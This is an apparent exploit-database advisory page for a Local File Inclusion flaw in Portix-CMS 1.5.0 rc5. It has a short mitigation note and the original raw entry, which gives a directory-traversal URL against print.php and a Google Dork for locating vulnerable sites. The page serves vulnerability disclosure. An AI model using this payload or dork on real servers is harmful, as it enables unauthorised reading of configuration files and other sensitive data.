header-logo
Suggest Exploit
vendor:
Portix-CMS
by:
Or4nG.M4n
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Portix-CMS
Affected Version From: v1.5.0. rc5
Affected Version To: v1.5.0. rc5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8
n/a

Portix-CMS 1.5.0. rc5 Local File Inclusion

Portix-CMS 1.5.0. rc5 is vulnerable to Local File Inclusion (LFI) attacks. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences and file names to the vulnerable server. This will allow the attacker to read sensitive files from the server, such as configuration files, source code, etc. The vulnerable URL is http://<=- Domain -=>/<=- Path -=>/print.php?page=../../../../../../../../../../[LFI].

Mitigation:

To mitigate this vulnerability, the application should be configured to only allow access to files that are necessary for the application to function. Additionally, the application should be configured to only allow access to files that are located within the application's directory structure.
Source

Exploit-DB raw data:

-==================== in The Name Of aLLah ====================- 
# Title: Portix-CMS 1.5.0. rc5 Local File Inclusion
# Google Dork: inurl:livriel.php?livriel=
# Date: n/a
# Author: Or4nG.M4n
# Link: http://www.easy-script.com/scripts-PHP/portix-cms-150-rc5-3005.html
# Version: v1.5.0. rc5
# Tested on: windows 8
# Home : 1337r1z.wordpress.com | sec4ever.com | Tryag.cc | cc.7rs.org

~ ( Exploit Local File ) ~ 

1 . http://<=- Domain -=>/<=- Path -=>/print.php?page=../../../../../../../../../../[LFI]

~ ( Greetz ) ~
<=[  sA^Dev!L , i-Hmx , Fox ,  Lagripe-dz , And Welcome back sec4ever.com ... ]=>
-==================== in The Name Of aLLah ====================-

Navigation

Suggest Exploit

Services By CQR